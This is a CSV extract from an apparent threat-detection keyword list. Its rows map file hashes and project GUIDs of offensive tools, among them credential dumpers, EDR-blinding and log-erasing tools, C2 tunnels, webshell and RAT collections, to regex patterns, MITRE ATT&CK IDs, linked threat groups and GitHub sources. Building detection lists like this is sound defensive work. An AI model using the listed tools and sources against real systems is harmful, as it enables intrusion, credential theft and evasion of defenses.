"*099b726fb0a1160c72e7f8ea20313721f9a060b48eb95bb9c5b7aaee948439c2*",".{0,1000}099b726fb0a1160c72e7f8ea20313721f9a060b48eb95bb9c5b7aaee948439c2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21355" "*099c3eb732a58c9f6c99b0920f10a1d516577009c1c2ac1a1da4133a7092db57*",".{0,1000}099c3eb732a58c9f6c99b0920f10a1d516577009c1c2ac1a1da4133a7092db57.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","0","#filehash","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","21356" "*09aa42564f461b40c5d610872ad6939f8dc31f9bc88be7b9604845fb61be5176*",".{0,1000}09aa42564f461b40c5d610872ad6939f8dc31f9bc88be7b9604845fb61be5176.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","21359" "*09aa42564f461b40c5d610872ad6939f8dc31f9bc88be7b9604845fb61be5176*",".{0,1000}09aa42564f461b40c5d610872ad6939f8dc31f9bc88be7b9604845fb61be5176.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give 
you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","21360" "*09b0fe289efa8c6364964bddedb339a7d43b0eaae912ef4c3f357325c6c55b61*",".{0,1000}09b0fe289efa8c6364964bddedb339a7d43b0eaae912ef4c3f357325c6c55b61.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","21361" "*09b3f22e8ad0fe1b6c07c202f07816fe3d4014835f3311620ca3b0bd5f710fe7*",".{0,1000}09b3f22e8ad0fe1b6c07c202f07816fe3d4014835f3311620ca3b0bd5f710fe7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21362" "*09bbcb9f2fd54e7a14b71beebb6a69127a422c17a43838a0e1bfcba45813620e*",".{0,1000}09bbcb9f2fd54e7a14b71beebb6a69127a422c17a43838a0e1bfcba45813620e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21364" "*09c297ffdf475a85c46c9332884fc3343d2512318f9be43b21bf45f522d12956*",".{0,1000}09c297ffdf475a85c46c9332884fc3343d2512318f9be43b21bf45f522d12956.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21365" "*09d13749a026c345f3f75549abbdc3b082fdb3e51f43bd62bbc0cd2dfeb51e62*",".{0,1000}09d13749a026c345f3f75549abbdc3b082fdb3e51f43bd62bbc0cd2dfeb51e62.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21369" "*09d3cc04fe795a9883abe23bee0ba2b011a4ed759e09dffd811f157233688be4*",".{0,1000}09d3cc04fe795a9883abe23bee0ba2b011a4ed759e09dffd811f157233688be4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21370" "*09d9169b42e10b354ce44c9bdb8f06c52506f14f39f6378e52b3c2eac1d27866*",".{0,1000}09d9169b42e10b354ce44c9bdb8f06c52506f14f39f6378e52b3c2eac1d27866.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21371" "*09e0c32321b7bc4b6d95f4a36d9030ce2333d67ffff15e4ff51631c3c4aa319d*",".{0,1000}09e0c32321b7bc4b6d95f4a36d9030ce2333d67ffff15e4ff51631c3c4aa319d.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","0","#filehash","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","21373" "*09e9ba137516adc361f33e2131db31841edb2f83c133a4e2790878997344e4ba*",".{0,1000}09e9ba137516adc361f33e2131db31841edb2f83c133a4e2790878997344e4ba.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21375" "*09e9c1c8da3f14a7910538675ac43764e07fc91c15df116519059a1af942d902*",".{0,1000}09e9c1c8da3f14a7910538675ac43764e07fc91c15df116519059a1af942d902.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21376" "*09ec07ace796cf563fbad7a25a4749002ec748720e6d1bcdcca989a68f4d4c3c*",".{0,1000}09ec07ace796cf563fbad7a25a4749002ec748720e6d1bcdcca989a68f4d4c3c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21377" "*09efed04888379b1fa6378ec5c4a944626129d92793a132ff56ab5d11fe53714*",".{0,1000}09efed04888379b1fa6378ec5c4a944626129d92793a132ff56ab5d11fe53714.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","21378" "*09ffc42c2a49a422f8092f0cc5c899f92144e667376aa666c36799c70a2d491e*",".{0,1000}09ffc42c2a49a422f8092f0cc5c899f92144e667376aa666c36799c70a2d491e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21380" "*0a070709fc2cac96d80f18a03eb7c539958c51e392475a0789aef50181707613*",".{0,1000}0a070709fc2cac96d80f18a03eb7c539958c51e392475a0789aef50181707613.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21381" "*0a0be178cd014f569eac8697ce355c7ceb59b7e1a3aaa18673a7ffde4a044c88*",".{0,1000}0a0be178cd014f569eac8697ce355c7ceb59b7e1a3aaa18673a7ffde4a044c88.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","#filehash","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","21383" "*0a0f2a82d5f3dbd8d9f8c6031b2ebb8c1820cf370e6b4fae2b1396cf2107dddd*",".{0,1000}0a0f2a82d5f3dbd8d9f8c6031b2ebb8c1820cf370e6b4fae2b1396cf2107dddd.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","#filehash","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","21384" "*0a1253e1b523145145d03cdbee23afef894beb26fc0c9995588546bbd81d9a3e*",".{0,1000}0a1253e1b523145145d03cdbee23afef894beb26fc0c9995588546bbd81d9a3e.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21385" "*0a140743a725d685faa98e11f0d34ab19c9531c50ac57c8b1ddbfa683057519d*",".{0,1000}0a140743a725d685faa98e11f0d34ab19c9531c50ac57c8b1ddbfa683057519d.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","21386" "*0a1720f433f5e22118dea9126637364b222b25d812cbb3a9c35fcbc8561650db*",".{0,1000}0a1720f433f5e22118dea9126637364b222b25d812cbb3a9c35fcbc8561650db.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","21388" "*0a1b6ab86651abe08734c0f185542c08ad8942e450b822a111553798f2f37302*",".{0,1000}0a1b6ab86651abe08734c0f185542c08ad8942e450b822a111553798f2f37302.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21389" "*0A1C2C46-33F7-4D4C-B8C6-1FC9B116A6DF*",".{0,1000}0A1C2C46\-33F7\-4D4C\-B8C6\-1FC9B116A6DF.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process 
injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","0","#GUIDproject","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","21390" "*0a1f9274ad63a72a443e82c19ab6c4e72c42eb4b399c3089b414abed4a9c4301*",".{0,1000}0a1f9274ad63a72a443e82c19ab6c4e72c42eb4b399c3089b414abed4a9c4301.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21391" "*0a235cd4c61c042f550e1b348ed8f8ca3bd8254bb72213ecf7ec172eec7edba5*",".{0,1000}0a235cd4c61c042f550e1b348ed8f8ca3bd8254bb72213ecf7ec172eec7edba5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21392" "*0A2B3F8A-EDC2-48B5-A5FC-DE2AC57C8990*",".{0,1000}0A2B3F8A\-EDC2\-48B5\-A5FC\-DE2AC57C8990.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","#GUIDproject","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","21393" "*0a2dbf9faa4445dfca15c92c6048cfca1e98ad9981f3c8349e7ffa34e62f638d*",".{0,1000}0a2dbf9faa4445dfca15c92c6048cfca1e98ad9981f3c8349e7ffa34e62f638d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21394" "*0a33c2da28a068610b62a369635506fbd4a15233867c9c1e3041948006177cb6*",".{0,1000}0a33c2da28a068610b62a369635506fbd4a15233867c9c1e3041948006177cb6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21395" "*0a3659cf00c99f85805b64bdbde13f3f3993163c0eaa5a6345e301c4331fb581*",".{0,1000}0a3659cf00c99f85805b64bdbde13f3f3993163c0eaa5a6345e301c4331fb581.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21397" "*0a551dde187ba9984902de12b5de1d1d6ed17ba02eabeb9fa41ed2fe35d52faf*",".{0,1000}0a551dde187ba9984902de12b5de1d1d6ed17ba02eabeb9fa41ed2fe35d52faf.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21401" "*0a5e1abf70407a1de22cd14107dca8019bab45e8bfe4c45ca1e05e7e8bb92e89*",".{0,1000}0a5e1abf70407a1de22cd14107dca8019bab45e8bfe4c45ca1e05e7e8bb92e89.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21402" "*0a6347197e46688711834531a7f75308298a9aa543c889a61260138d73e96634*",".{0,1000}0a6347197e46688711834531a7f75308298a9aa543c889a61260138d73e96634.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21403" "*0a65867b6b4cb21b8a6bbaf06b355a36283b30840e02706bfd740c9da9f4197b*",".{0,1000}0a65867b6b4cb21b8a6bbaf06b355a36283b30840e02706bfd740c9da9f4197b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21404" "*0a660e5933bd61f6a564cc86bc9ac4a573e104de8de35575a4a09d61357958b0*",".{0,1000}0a660e5933bd61f6a564cc86bc9ac4a573e104de8de35575a4a09d61357958b0.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","21405" "*0a74fdd3e97e8a940712f5a9cf0052c773b49a39788f3611e73cf00076b608ea*",".{0,1000}0a74fdd3e97e8a940712f5a9cf0052c773b49a39788f3611e73cf00076b608ea.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - 
T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21407" "*0a78cc032cff5d0c355e26a8d64bbbcd8b27124a2e82a5db1208cc70430f85d9*",".{0,1000}0a78cc032cff5d0c355e26a8d64bbbcd8b27124a2e82a5db1208cc70430f85d9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21408" "*0A78E156-D03F-4667-B70E-4E9B4AA1D491*",".{0,1000}0A78E156\-D03F\-4667\-B70E\-4E9B4AA1D491.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","21409" "*0a7cf0b0d8f68eec8829dde1d90183087d641547a6c97de021db9a631da99857*",".{0,1000}0a7cf0b0d8f68eec8829dde1d90183087d641547a6c97de021db9a631da99857.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential 
Access","https://github.com/GhostPack/SharpDump","1","0","#filehash","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","21411" "*0a7cf0b0d8f68eec8829dde1d90183087d641547a6c97de021db9a631da99857*",".{0,1000}0a7cf0b0d8f68eec8829dde1d90183087d641547a6c97de021db9a631da99857.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","21412" "*0a98ba3860779e363cebbdc08b6adce4c82c11276e705ac53fbbc3fafd3f6b59*",".{0,1000}0a98ba3860779e363cebbdc08b6adce4c82c11276e705ac53fbbc3fafd3f6b59.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21416" "*0a99e30e751c3a01ffe34efaa615c55a6cbbc42038f7004ac356dad5dbba1ada*",".{0,1000}0a99e30e751c3a01ffe34efaa615c55a6cbbc42038f7004ac356dad5dbba1ada.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21417" "*0aa6a04c0e8bb0022ccbe0c6f2bf6bc1806c59ffffae3981ae083e49e78573b7*",".{0,1000}0aa6a04c0e8bb0022ccbe0c6f2bf6bc1806c59ffffae3981ae083e49e78573b7.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#filehash","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","21418" "*0aa81384c29ae395069a9d6bf226f1345c7909cdc7181c2c4f1c9015268e940d*",".{0,1000}0aa81384c29ae395069a9d6bf226f1345c7909cdc7181c2c4f1c9015268e940d.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","21419" 
"*0aaf0c9b2f4f67ea3012cef59464ce4899556e29920bdbec219f469e1b8fe935*",".{0,1000}0aaf0c9b2f4f67ea3012cef59464ce4899556e29920bdbec219f469e1b8fe935.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21420" 